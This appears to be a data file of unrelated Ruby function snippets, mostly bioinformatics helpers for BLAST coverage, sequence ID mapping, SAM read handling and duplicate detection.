"def check_duplication (n=10)\n\n # get the first n hits\n less_hits = @hits[0..[n-1,@hits.length].min]\n averages = []\n\n less_hits.each do |hit|\n # indexing in blast starts from 1\n start_match_interval = hit.hsp_list.each.map{|x| x.hit_from}.min - 1\n end_match_interval = hit.hsp_list.map{|x| x.hit_to}.max - 1\n \n #puts \"#{hit.xml_length} #{start_match_interval} #{end_match_interval}\" \n\n coverage = Array.new(hit.xml_length,0)\n hit.hsp_list.each do |hsp|\n aux = []\n # for each hsp\n # iterate through the alignment and count the matching residues\n [*(0 .. hsp.align_len-1)].each do |i|\n residue_hit = hsp.hit_alignment[i]\n residue_query = hsp.query_alignment[i]\n if residue_hit != ' ' and residue_hit != '+' and residue_hit != '-'\n if residue_hit == residue_query \n idx = i + (hsp.hit_from-1) - hsp.hit_alignment[0..i].scan(/-/).length \n aux.push(idx)\n #puts \"#{idx} #{i} #{hsp.hit_alignment[0..i].scan(/-/).length}\"\n # indexing in blast starts from 1\n coverage[idx] += 1\n end\n end\n end\n end\n overlap = coverage.reject{|x| x==0}\n averages.push(overlap.inject(:+)/(overlap.length + 0.0))\n end\n \n # if all hsps match only one time\n if averages.reject{|x| x==1} == []\n return [\"NO\",1]\n end\n\n R.eval(\"library(preprocessCore)\")\n\n #make the wilcox-test and get the p-value\n R.eval(\"coverageDistrib = c#{averages.to_s.gsub('[','(').gsub(']',')')}\")\n R. eval(\"pval = wilcox.test(coverageDistrib - 1)$p.value\")\n pval = R.pull \"pval\"\n\n if pval < 0.01\n status = \"YES\"\n else\n status = \"NO\"\n end\n return [status, pval]\n end",
"def mappa_e_rimuovi_duplicati(&block)\n self.map.with_index(&block).uniq\n end",
"def split_upids(idmap_file)\n puts \"split idmapping.dat to each prefix files\"\n up_refp_output = prepare_prefix_files(idmap_file, \"protein_id\")\n up_refg_output = prepare_prefix_files(idmap_file, \"gene_id\")\n\n cnt = 0\n # it is assumed that the tax_id is followed by a protein_id or gene_id\n current_tax = {upid: nil, tax_id: nil}\n taxid_missing_list = [] \n File.open(idmap_file, \"r\") do |f|\n f.each_line do |line|\n up, xref, id = line.strip.split(\"\\t\")\n case xref\n when \"NCBI_TaxID\"\n current_tax = {upid: up.split(\"-\").first, tax_id: id}\n when \"RefSeq\", \"GeneID\"\n # Push only the tax_id with refseq protein_id or gene_id\n if current_tax[:upid] == up.split(\"-\").first\n if xref == \"RefSeq\"\n prefix = id.chomp.strip[0..4]\n up_refp_output[prefix].puts line.chomp.strip + \"\\t\" + current_tax[:tax_id]\n elsif xref == \"GeneID\"\n prefix = id.chomp.strip[0]\n up_refg_output[prefix].puts line.chomp.strip + \"\\t\" + current_tax[:tax_id]\n end\n else\n taxid_missing_list.push(up)\n end\n end\n cnt += 1\n if (cnt % 100000 == 0)\n puts cnt\n end\n end\n # list of upid that can't get taxid. Depends on the order of idmapping.dat\n out = File.open(\"taxid_missing_list.json\", \"w\") unless taxid_missing_list.size == 0\n taxid_missing_list.each do |upid|\n out.puts JSON.pretty_generate(taxid_missing_list)\n end\n end\n\n # close files\n up_refp_output.each do |k, v|\n v.flush\n v.close\n end\n up_refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def candidates2fa(input_file, fasta, read_length, output_file, exoncov=8)\n\t\tchromosomes = {}\n\t\tpositions = []\n\t\t\n\t\t# Input into hash sorted by chromosomes\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")[0..-2]\n\t\t\tchr_a, pos_a, strand_a, chr_b, pos_b, strand_b = line[0..5]\n\t\t\tpos = [chr_a, pos_a, chr_b, pos_b].join(':')\n\t\n\t\t\tchromosomes[chr_a] = {} if !chromosomes.has_key?(chr_a)\n\t\t\t\n\t\t\tif !chromosomes.has_key?(chr_b)\n\t\t\t\tchromosomes[chr_a][chr_b] = [line]\n\t\t\n\t\t\t# 2nd elsif to exclude reads that map on same junction but opposite ends\t\t\n\t\t\telsif chromosomes[chr_a].has_key?(chr_b) && !positions.include?(pos)\n\t\t\t\tchromosomes[chr_a][chr_b].push(line)\n\t\t\t\tpositions << pos\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\toutput = File.open(output_file, 'w') do |output|\n\t\t\tchromosomes.each do |chr_a, values|\n\t\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\t\t\t\t\n\t\t\t\tvalues.each do |chr_b, values|\n\t\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n\t\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t\tvalues.each do |v|\n\t\t\t\t\t\tbp_a, bp_b = v[1].to_i, v[4].to_i\n\t\t\t\t\t\tstrand_a, strand_b = v[2], v[5]\n\t\t\t\t\t\toverlap = v[-1].to_i - read_length\n\t\t\t\t\t\tl = read_length - exoncov \n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tupstream = dna_a[bp_a..bp_a + overlap + l].upcase\t\n\t\t\t\t\t\tdownstream = dna_b[bp_b - l - overlap + 1..bp_b - overlap].upcase\n\t\t\t\t\t\n\t\t\t\t\t\tif strand_a == '1' && strand_b == '-1'\n\t\t\t\t\t\t\tdownstream = Alignment.reverse_complement(dna_b[bp_b..bp_b + l].upcase)\n\t\t\t\t\t\telsif strand_a == '-1' && strand_b == '1'\n\t\t\t\t\t\t\tupstream = Alignment.reverse_complement(dna_a[bp_a - l + 1..bp_a].upcase)\n\t\t\t\t\t\tend\n\t\t\n\t\t\t\t\t\tid = [v[0..1], v[3..4]].join(':')\n\t\t\t\t\t\toutput.puts [\">#{id}\", downstream + upstream].join(\"\\n\")\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Wrote loci to fasta-file.\"\n\tend",
"def hash_selectreads(samstring, samread, data, bamfile)\n\t\tselread = Hash.new {|h,k| h[k] = {} }\n\t\treadcount = 0;\n\t\tsamstring.split(\"\\n\").each do |string|\n\t\t\tsaminfo = string.split(\"\\t\")\n\t\t\tif samread.key?(saminfo[0]) == true\n\t\t\t\tterm = [saminfo[0], saminfo[1], saminfo[3]].join(\"_\")\n\t\t\t\tif data[bamfile].key?(term.to_s) == true\n\t\t\t\t\treadcount += 1\n\t\t\t\t\tselread[saminfo[0]][:cigar] = saminfo[5]\t\t\t\t\t\t\t# read id is key and cigar is value\n\t\t\t\t\tselread[saminfo[0]][:seq] = [saminfo[3], saminfo[9]].join(\"\\t\")\t# read id is key and alignment position & read sequence is value\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn selread, readcount\n\tend",
"def mm_allreads(cigarstring, samread, posdiff)\n\t\tcount = 0\n\t\tcigarstring.split(\",\").each do |cig|\n\t\t\tcigar = Cigar.find_by(id: cig)\n\t\t\tif samread.key?(cigar.read_id.to_s) == true\n\t\t\t\tplayerpos = cigar.pos.to_i + posdiff\n\t\t\t\tif samread[cigar.read_id.to_s][:cigar] != cigar.data.to_s\n\t\t\t\t\tcount = count + 1\n\t\t\t\telsif samread[cigar.read_id.to_s][:bwapos].to_i != playerpos\n\t\t\t\t\tcount = count + 1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn count\n\tend",
"def read_mrp\n $MRP_FILE = $PRJ_NAME + \"_map.mrp\"\n f = open($MRP_FILE,\"r\")\n while line = f.gets\n if /ERROR/ =~ line\n /LOC=(.*)\\)/ =~ line # pick up Slice name\n $ERROR_SLICE << $1\n end\n end\n f.close\n $ERROR_SLICE.uniq!\nend",
"def map_tgup_by_geneid()\n Dir.glob(\"#{$prepare_dir}/refg/*.dat\") do |input_file|\n refseq_gene_list = []\n gene_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"gene_id prefix: #{gene_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n up_list = load_up_refg(gene_id_prefix) # get same prefix data from UniProt\n refseq_gene_list.each do |refseq_data|\n match = false\n unless up_list.nil? # exist prefix list on UniProt\n match_list = up_list[refseq_data[:gene_id]]\n unless match_list.nil?\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid]\n output_idmap(refseq_data, up_info[:upid])\n match = true\n end\n end\n end\n end\n if match == false\n $no_up += 1\n end\n end\n end\nend",
"def duplicate_imports_info\n import_frequency_mapping = {}\n all_imports.uniq.each do |item|\n item_occurrence = all_imports.count(item)\n if item_occurrence > 1\n import_frequency_mapping[item.chomp] = item_occurrence\n end\n end\n import_frequency_mapping\n end",
"def km_get_reacid(data)\n return data.map{|d| d.scan(/(?<r>R\\d{5})/)}.flatten.sort\nend",
"def find_errors(data)\n keys = Hash.new(0)\n columns = [data.chron_column, data.dimension_columns].flatten.compact\n allkeys = columns.map{|col| col.values}.transpose\n allkeys.each {|keylist| keys[keylist] += 1}\n duplicates = []\n keys.each_pair do |key, count|\n duplicates << key if count > 1\n end\n duplicates.each do |dup|\n @errors << \"Duplicate entry in source for (#{dup.map {|key| key.to_s}.join(', ')})\"\n end\n end",
"def identify_duplicate_sequences sequences\n sequences.select { |e| sequences.count(e) > 1 }.uniq\n end",
"def dupe_indices(array)\n #ht = Hash.new {|h,k| h[k]=[]}\n #ht[\"cats\"] << \"Jellicle\"\n #ht[\"cats\"] << \"Mr. Mistoffelees\"\n hash = Hash.new { |h,k| h[k]=[] }\n array.each_with_index do |char, i|\n hash[char] << i\n end\n \n # puts \"Hash b select form : #{b.select{|key, value| value < 200}}\\n\\n\n hash.select{ |k,v| v.length > 1}\n\n\nend",
"def uniq(networkcheckoutput)\n mash = Hashie::Mash.new networkcheckoutput\n #networkcheckoutput.hits.hits.each do |value|\n\n #this creates a dataset of unique values based on a specified field. Need to break the Date out of the timestamp field to use.\n seen = Set.new\n mash.hits.hits.inject([]) do |kept, record|\n\n\n #brokenfield = record._source.src_ip.match(/\\w++ [^_]\\w/)\n\n unless seen.include?(record._source.src_ip)\n kept << record\n seen << record._source.src_ip\n end\n kept\n end\n end",
"def parse_to_file(line)\n\n z_unique = File.new(@outdir+\"_unique\", 'w')\n z_non_unique = File.new(@outdir+\"_non_unique\", 'w')\n\n while !@filehandler.eof?\n entry1 = make_content(line)\n line = @filehandler.readline()\n entry2 = make_content(line)\n if entry1.q_name == entry2.q_name\n # What if on same chromosome?\n # calling helper procedure\n entries << entry1\n marker2 = true\n while entry1.q_name == entry2.q_name\n\n if entry1.t_name == entry2.t_name\n\n entries << entry2\n\n if @filehandler.eof?\n marker = false\n break\n else\n line = @filehandler.readline()\n entry2 = make_content(line)\n marker = 1\n end\n\n else\n marker2 = false\n\n @counter_non_unique += 1\n\n out = \"#{entry1.to_s()}\"\n z_non_unique.write(out+\"\\n\")\n\n while entry1.qname == entry2.qname\n\n out = \"#{entry2.to_s()}\"\n z_non_unique.write(out+\"\\n\")\n\n if @filehandler.eof?\n marker = false\n break\n else\n line = @filehandler.readline()\n entry2 = make_content(line)\n marker = 1\n end\n end\n\n end\n\n if marker2\n is_in_range?(entries, z_unique, z_non_unique)\n end\n\n\n else\n @counter_unique += 1\n out = \"#{entry1.to_s()}\"\n z_unique.write(out+\"\\n\")\n marker = false\n end\n end\n if marker\n @counter_unique += 1\n out = \"#{entry2.to_s()}\"\n z_unique.write(out+\"\\n\")\n end\n\n puts \"Unique: #{@counter_unique} Non_unique: #{@counter_non_unique}\"\n z_non_unique.close\n z_unique.close\n end",
"def mots_uniques\n @mots_uniques ||= begin\n self.select do |mot_min, arr_indexes|\n arr_indexes.count == 1\n end.keys\n end\n end",
"def identify_unique_views_parsed_file\n parsed_file.select { |v| parsed_file.count(v) > 1 }.uniq\n end",
"def read_singletons(singletons, read_length)\n\t\tsingle_reads = {}\n\t\t\n\t\tFile.open(singletons, 'r').readlines.each do |line|\n \n \t\tline = line.strip.split(/\\s+/)\n \t\tqname, flag, chr, start = line[0..3] \t\n \t\tflag.to_i & 0x10 > 0 ? strand = -1 : strand = 1\n \t\tcigar = line[5]\n\t\t\tdistance = genomic_mappinglength(cigar, read_length)\n\t\t\t\n\t\t\tif distance != false\n\t\t\t\tstrand == 1 ? stop = start + distance : stop = start - distance\n\t\t\t\tsingle_reads[qname] = [chr, start, stop, strand]\n\t\t\tend\n\t\tend\n\t\tsingle_reads\n\tend",
"def count_duplicate_matches(matches)\n matches.map { |match| matches_hash[Set.new match] }.reduce(0, :+)\n end",
"def split_exact_dups(dups_hash)\n dups_hash.partition { |_id, docs| docs.map(&:to_hash).uniq.size == 1 }\n end",
"def parse_to_file(outdir)\n z_unique = File.new(outdir+\"_unique\", 'w')\n z_non_unique = File.new(outdir+\"_non_unique\", 'w')\n entries = []\n while !@filehandler.eof?\n entry1 = make_entry()\n line = @filehandler.readline()\n entry2 = make_entry()\n if entry1.q_name == entry2.q_name\n # What if on same chromosome?\n # calling helper procedure\n entries << entry1\n marker2 = true\n while entry1.q_name == entry2.q_name\n # same chrosome?\n if entry1.t_name == entry2.t_name\n entries << entry2\n if @filehandler.eof?\n marker = false\n break\n else\n line = @filehandler.readline()\n entry2 = make_entry()\n marker = true\n end\n else\n marker2 = false\n @counter_non_unique += 1\n out = \"#{entry1.to_s()}\"\n z_non_unique.write(out+\"\\n\")\n while entry1.q_name == entry2.q_name\n out = \"#{entry2.to_s()}\"\n z_non_unique.write(out+\"\\n\")\n if @filehandler.eof?\n marker = false\n break\n else\n line = @filehandler.readline()\n entry2 = make_entry()\n marker = 1\n end\n end\n end\n if marker2\n is_in_range?(entries, z_unique, z_non_unique)\n end\n end\n else\n @counter_unique += 1\n out = \"#{entry1.to_s()}\"\n z_unique.write(out+\"\\n\")\n marker = false\n end\n end\n if marker\n @counter_unique += 1\n out = \"#{entry2.to_s()}\"\n z_unique.write(out+\"\\n\")\n end\n\n z_non_unique.close\n z_unique.close\n end",
"def duplicate_ids\n return [] if accession_number.nil?\n Image.where(accession_number_ssim: @accession_number)\n end",
"def processdup_all(c)\n prev_base = nil\n show = false\n c.each do |l|\n base = get_base(l[:file])\n if prev_base && base != prev_base\n show = true\n break\n end\n prev_base = base\n end\n if show\n c.each do |l|\n puts \"#{get_file(l[:file])} similarity #{l[:count]}\"\n end\n puts \"\"\n end\nend",
"def filter_similar_pid(cutoff = 10)\n seq = self.dna_hash.dup\n uni_seq = seq.values.uniq\n uni_seq_pid = {}\n uni_seq.each do |k|\n seq.each do |name,s|\n name = name[1..-1]\n if k == s\n if uni_seq_pid[k]\n uni_seq_pid[k] << [name.split(\"_\")[0],name.split(\"_\")[1]]\n else\n uni_seq_pid[k] = []\n uni_seq_pid[k] << [name.split(\"_\")[0],name.split(\"_\")[1]]\n end\n end\n end\n end\n\n dup_pid = []\n uni_seq_pid.values.each do |v|\n next if v.size == 1\n pid_hash = Hash[v]\n list = pid_hash.keys\n list2 = Array.new(list)\n pairs = []\n\n list.each do |k|\n list2.delete(k)\n list2.each do |k1|\n pairs << [k,k1]\n end\n end\n\n pairs.each do |p|\n pid1 = p[0]\n pid2 = p[1]\n if pid1.compare_with(pid2) <= 1\n n1 = pid_hash[pid1].to_i\n n2 = pid_hash[pid2].to_i\n if n1 >= cutoff * n2\n dup_pid << pid2\n elsif n2 >= cutoff * n1\n dup_pid << pid1\n end\n end\n end\n end\n\n new_seq = {}\n seq.each do |name,s|\n pid = name.split(\"_\")[0][1..-1]\n unless dup_pid.include?(pid)\n new_seq[name] = s\n end\n end\n self.sub(new_seq.keys)\n end",
"def match_assembly\n @assembly_map = {}\n lines.each { |lno, assems|\n assems.each { |assem|\n if @assembly_map[assem].nil? then\n @assembly_map[assem] = [lno]\n else \n @assembly_map[assem] << lno\n end\n }\n \n }\n end",
"def hashNQS()\n @hash_nqs={}\n nqsReader=File.open(@nqsFile,\"r\")\n nqsReader.each do |line|\n cols=line.split(/\\s+/)\n \n name=cols[0]\n next if name==\"readName\"\n length=cols[1]\n dist=cols[2]\n qual=cols[3].to_i\n pass=cols[4]\n \n str_result=length+'.'+pass\n str=name+'.'+dist\n if @hash_nqs[str]==nil\n @hash_nqs[str]=str_result\n end\n end\n nqsReader.close\n $stderr.puts @hash_nqs.size\nend",
"def compare_all_rows\n @guess_rows.map do |guess|\n right_color = 0 \n right_spot = 0\n guess.get_pins.each.with_index do |pin, index|\n if pin == @correct_row.get_pins[index]\n right_spot += 1\n end\n end\n right_color = (guess.get_pins & @correct_row.get_pins).count\n [right_spot, right_color - right_spot, guess]\n end\n end",
"def uniq!\n im = Rubinius::IdentityMap.from self\n return if im.size == size\n\n Rubinius.check_frozen\n\n array = im.to_array\n @tuple = array.tuple\n @start = array.start\n @total = array.total\n\n self\n end",
"def selectreads(samstring, samread, data, bamfile)\n\t\tselread = Hash.new {|h,k| h[k] = {} }\n\t\treadcount = 0;\n\t\tsamstring.split(\"\\n\").each do |string|\n\t\t\tsaminfo = string.split(\"\\t\")\n\t\t\tif samread.key?(saminfo[0]) == true\n\t\t\t\tterm = [saminfo[0], saminfo[1], saminfo[3]].join(\"_\")\n\t\t\t\tif data[bamfile].key?(term.to_s) == true\n\t\t\t\t\treadcount += 1\n\t\t\t\t\tselread[saminfo[0]][:cigar] = saminfo[5]\n\t\t\t\t\tselread[saminfo[0]][:bwapos] = saminfo[3]\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn selread, readcount\n\tend",
"def sequence_check_for_submission(sequence,group_hash,reversed_group_hash)\n\n result_array = Array.new\n aa_threshold = 0.9\n \n begin\n \n query = Bio::FastaFormat.new( sequence )\n query_name = query.definition\n sequence = query.to_seq\n\n existing_matched_group_exist = CustomizedProteinSequence.find_by(:chain => sequence.seq)\n if !existing_matched_group_exist.nil? # find existing sequence\n result_array << collection(query_name, \"WARN\", \"Your sequence exists in our database. Common Name: #{existing_matched_group_exist.header} \")\n return result_array\n end\n\n sequence.auto # Guess the type of sequence. Changes the class of sequence.\n query_sequence_type = sequence.seq.class == Bio::Sequence::AA ? 'protein' : 'gene'\n\n program = 'blastp'\n database = 'reductive_dehalogenase_protein'\n blast_options = get_blast_options\n\n\n blaster = Bio::Blast.local( program, \"#{Rails.root}/index/blast/#{database}\", blast_options)\n aa_report = blaster.query(sequence.seq) # sequence.seq automatically remove the \\n; possibly other wildcard\n aa_similarity = aa_report.hits().length.to_f / aa_report.db_num().to_f\n identity_with_90 = check_alignment_identity(aa_report, 90) # identity_with_90 contains all the header that share >=90% identity\n\n # group_hash => group : Array {seq_definition}\n # reversed_group_hash = seq_definition : group\n if identity_with_90.length > 0\n identified_group_at_aa_level = get_identified_group(identity_with_90,group_hash,reversed_group_hash) # identified_group_at_aa_level contains confirmed group in aa level \n else\n # if identity_with_90.length == 0; no RD with ~=90% identity => create new RD groups\n\n if aa_similarity >= aa_threshold\n last_group = CustomizedProteinSequence.group(:group).order(:group).last.group\n new_group_number = last_group + 1\n result_array << collection(query_name,\"NEW\", \"Your sequence belongs to a new RD group: #{new_group_number}\",new_group_number)\n else\n result_array << collection(query_name, \"FAILED\",\"Your sequence doesn't share 90\\% identity of any sequences in database at amino acid level.\")\n end\n\n return result_array\n end\n\n if identified_group_at_aa_level.length > 0\n result_array << collection(query_name, \"SUCCESS\",\"Your sequence belongs RD group: #{identified_group_at_aa_level.join(\",\")}\",identified_group_at_aa_level.join(\",\"))\n else\n result_array << collection(query_name, \"FAILED\",\"Your sequence doesn't share 90\\% identity with all representatives of the group at amino acid level.\")\n end\n\n return result_array\n \n rescue => exception\n # puts exception\n result_array << collection(query_name, \"ERROR\",\"Your sequence is not validated. Or send it to our lab for manual checking.\")\n end\n \n return result_array\n\n end",
"def fetch_unaligned_sequences \n answer = Array.new \n self.genomic_aligns.each do |piece| \n sequence = piece.get_slice.seq\n fas = Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(piece.genomic_align_id))\n answer.push(fas) \n end \n return answer \n end",
"def detect_long_insertion(insert_pair, clip_Bs2, clip_Fs2, unmap_seq, alt_read_depth=5)\n paired_indel_list = []\n insert_pair.each do |consensus_b, consensus_f|\n total_depth = consensus_b.depth + consensus_f.depth\n clip_chrpos_all = [consensus_b.start_pos, consensus_b.end_pos, consensus_f.start_pos, consensus_f.end_pos]\n clip_start = clip_chrpos_all.min\n clip_end = clip_chrpos_all.max\n consensus, _ = mafft_consensus([consensus_b, consensus_f], 1.0) # %identity = 1.0\n consensus, trim_flag = trim_consensus(consensus)\n # ---------------------------------------------------------------------------\n\n if consensus.count(\"?\") > 2 # SNP check, if the number of SNPs is more than 2 ( > 2), uncomplete Long Insertion\n #puts \"uncomplete long insertion...\"\n\n # re-alignement using unmapped read\n can_use_unmaps = unmap_seq.find_all do | unmap|\n (unmap.start_pos < clip_start && clip_start < unmap.end_pos) || (unmap.start_pos < clip_end && clip_end < unmap.end_pos)\n end\n if can_use_unmaps.empty? # unmap read is nothing\n clip_B_stt = consensus_b.start_pos # clip_B start pos\n clip_F_end = consensus_f.end_pos # clip_F end pos\n upper_LI = clip_Bs2[clip_B_stt]\n bottom_LI = clip_Fs2[clip_F_end]\n consensus = \"#{upper_LI}-----#{bottom_LI}\"\n if total_depth >= alt_read_depth # end pos is equal to sttpos\n paired_indel_list << Read.new(type: :ULI, start_pos: clip_B_stt, end_pos: clip_B_stt, seq: consensus, depth: total_depth)\n @mafft_inputs[paired_indel_list.last] = [consensus_b, consensus_f] if @mafft_inputs\n end\n\n else # unmap reads exist\n new_group_reads = ([consensus_b, consensus_f] + can_use_unmaps)\n new_consensus, _ = mafft_consensus(new_group_reads, 1.0) # make a consensus seq with the unmapped reads\n new_consensus, trim_flag = trim_consensus(new_consensus)\n\n if new_consensus.empty? || new_consensus.count(\"?\") > 2 # SNP check, if the number of SNPs is more than 2 ( >=3)\n clip_B_stt = consensus_b.start_pos # clip_B start pos\n clip_F_end = consensus_f.end_pos # clip_F end pos\n upper_LI = clip_Bs2[clip_B_stt]\n bottom_LI = clip_Fs2[clip_F_end]\n consensus = \"#{upper_LI}-----#{bottom_LI}\"\n if total_depth >= alt_read_depth # end pos is equal to sttpos\n paired_indel_list << Read.new(type: :ULI, start_pos: clip_B_stt, end_pos: clip_B_stt, seq: consensus, depth: total_depth)\n @mafft_inputs[paired_indel_list.last] = new_group_reads if @mafft_inputs\n end\n else\n new_consensus, _ = mafft_consensus(new_group_reads, 0.5) # make a consensus seq with the unmapped reads\n new_consensus = trim_consensus_with_flag(new_consensus, trim_flag)\n\n new_total_depth = new_group_reads.inject(0){|res, read| res += read.depth}\n if new_total_depth >= alt_read_depth ####\n paired_indel_list << Read.new(type: :LI_wU, start_pos: clip_start, end_pos: clip_end, seq: new_consensus, depth: new_total_depth)\n @mafft_inputs[paired_indel_list.last] = new_group_reads if @mafft_inputs\n end\n end\n end\n\n else\n consensus, _ = mafft_consensus([consensus_b, consensus_f], 0.5) # %identity = 0.5, consensus update\n consensus = trim_consensus_with_flag(consensus, trim_flag)\n\n #puts \"complete long insertion...\"\n #puts align_reads_names\n #puts\n if total_depth >= alt_read_depth ####\n paired_indel_list << Read.new(type: :LI, start_pos: clip_start, end_pos: clip_end, seq: consensus, depth: total_depth)\n @mafft_inputs[paired_indel_list.last] = [consensus_b, consensus_f] if @mafft_inputs\n end\n end\n end\n return paired_indel_list\n end",
"def mm_selreads(cigarstring, selread, posdiff)\n\t\tcount = 0\n\t\tcigarstring.split(\",\").each do |cig|\n\t\t\tcigar = Cigar.find_by(id: cig)\n\t\t\tif selread.key?(cigar.read_id.to_s) == true\n\t\t\t\tplayerpos = cigar.pos.to_i + posdiff\n\t\t\t\tif selread[cigar.read_id.to_s][:cigar] != cigar.data.to_s\n\t\t\t\t\tcount = count + 1\n\t\t\t\telsif selread[cigar.read_id.to_s][:bwapos].to_i != playerpos\n\t\t\t\t\tcount = count + 1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn count\n\tend",
"def find_secondaries\n\n if File.exist?(@reciprocal_hits)\n # puts \"reciprocal output already exists\"\n else\n length_hash = Hash.new\n fitting = Hash.new\n @evalues.each do |h|\n length_hash[h[:length]] = [] if !length_hash.key?(h[:length])\n length_hash[h[:length]] << h\n end\n\n (10..@longest).each do |centre|\n e = 0\n count = 0\n s = centre*0.1\n s = s.to_i\n s = 5 if s < 5\n (-s..s).each do |side|\n if length_hash.has_key?(centre+side)\n length_hash[centre+side].each do |point|\n e += point[:e]\n count += 1\n end\n end\n end\n if count>0\n mean = e/count\n fitting[centre] = mean\n end\n end\n hits = 0\n @missed.each_pair do |id, list|\n list.each do |hit|\n l = hit.alnlen.to_i\n e = hit.evalue\n e = 1e-200 if e==0\n e = -Math.log10(e)\n if fitting.has_key?(l)\n if e >= fitting[l]\n if !@reciprocals.key?(id)\n @reciprocals[id] = []\n found = false\n @reciprocals[id].each do |existing_hit|\n if existing_hit.query == hit.query &&\n existing_hit.target == hit.target\n found = true\n end\n end\n if !found\n @reciprocals[id] << hit\n hits += 1\n end\n end\n end\n end\n end\n end\n end\n return hits\n end",
"def prepare_reads(base, map, fqgz0, *fqgzs0)\n\n fqgzs = [fqgz0] + fqgzs0\n\n bcs = Hash.new\n open(map, 'r').each do |line|\n bc, well = line.rstrip.split(',')\n bcs[bc] = well\n end\n \n bcl = bcs.keys.map!{|key| key.length}.sort.uniq[0]\n\n tso_pattern = '.'*options.umi_length + '.'*bcl + 'GG'\n\n #\n \n STDERR.puts \"#{`date`.strip}: Demultiplexing each raw sequence files...\"\n \n fqgz2csv0 = Hash.new\n fqgz2csv1 = Hash.new\n fqgz2base = Hash.new\n fqgzs.each do |fqgz|\n fqgz2csv0[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2csv1[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2base[fqgz] = get_temporary_path('strt.preprocess', 'base', false)\n end\n\n Parallel.map(fqgz2csv0.keys, in_processes: options.parallel) do |fqgz|\n cmds = [\n \"unpigz -c #{fqgz}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv0[fqgz]}\",\n \"fq1l match_5end#{grep_prefix_option(options)} #{tso_pattern}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv1[fqgz]}\",\n \"fq1l annotate_index --first-cycle=#{options.umi_length+1} --last-cycle=#{options.umi_length+bcl}\",\n \"fq1l annotate_umi --first-cycle=1 --last-cycle=#{options.umi_length}\",\n \"fq1l sort_index#{coreutils_prefix_option}#{parallel_option(options)} --buffer-size=#{(options.maximum_memory/(fqgz2csv0.keys.size+1)).to_i}%\",\n \"fq1l demultiplex #{fqgz2base[fqgz]} #{map}\"\n ]\n cmds.insert(2, \"#{head_command(options)} -n #{options.reads}\") unless options.reads.nil?\n stats = Open3.pipeline(*cmds)\n stats.each_index do |i|\n raise \"Fail at process #{i}; #{stats[i]}; #{cmds[i]}\" unless stats[i].success? || (stats[i].signaled? && stats[i].termsig == 13)\n end\n end\n\n system \"fq1l sum_counts #{fqgz2csv0.values.join(' ')} > #{base}.count.step1.csv\"\n unlink_files(fqgz2csv0.values)\n \n system \"fq1l sum_counts #{fqgz2csv1.values.join(' ')} > #{base}.count.step2.csv\"\n unlink_files(fqgz2csv1.values)\n\n #\n \n (bcs.values + ['NA']).each do |well|\n\n STDERR.puts \"#{`date`.strip}: Finishing well #{well}...\"\n \n tmpfqgzs = fqgz2base.values.map {|base| \"#{base}.#{well}.fq.gz\"}\n csvs = Array.new(6) {|i| \"#{base}.#{well}.count.step#{i+3}.csv\"}\n \n pipeline(\"unpigz -c #{tmpfqgzs.join(' ')}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[0]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_duplicate\",\n \"#{fq1l_count_command(options)} #{csvs[1]}\",\n \"fq1l trim_3end_quality\",\n \"#{fq1l_count_command(options)} #{csvs[2]}\",\n \"fq1l trim_3end_primer#{coreutils_prefix_option}#{grep_prefix_option(options)}#{parallel_option(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[3]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_degenerate\",\n \"#{fq1l_count_command(options)} #{csvs[4]}\",\n \"fq1l trim_5end --minimum-length=#{options.minimum_length} #{tso_pattern}+\",\n \"#{fq1l_count_command(options)} #{csvs[5]}\",\n \"fq1l restore#{coreutils_prefix_option}\",\n \"pigz -c > #{base}.#{well}.fq.gz\")\n \n unlink_files(tmpfqgzs)\n \n end\n \n end",
"def merge_read_to_run(runid, reads)\n if reads.size == 1\n (reads[0].drop(1).insert(0, runid) << \"SINGLE\").join(\"\\t\")\n else\n pairs = remove_nonpair(reads)\n if pairs.size == 2\n merge_paired_reads(pairs).join(\"\\t\")\n else\n \"PAIR CORRUPTED: #{runid}\"\n end\n end\n end",
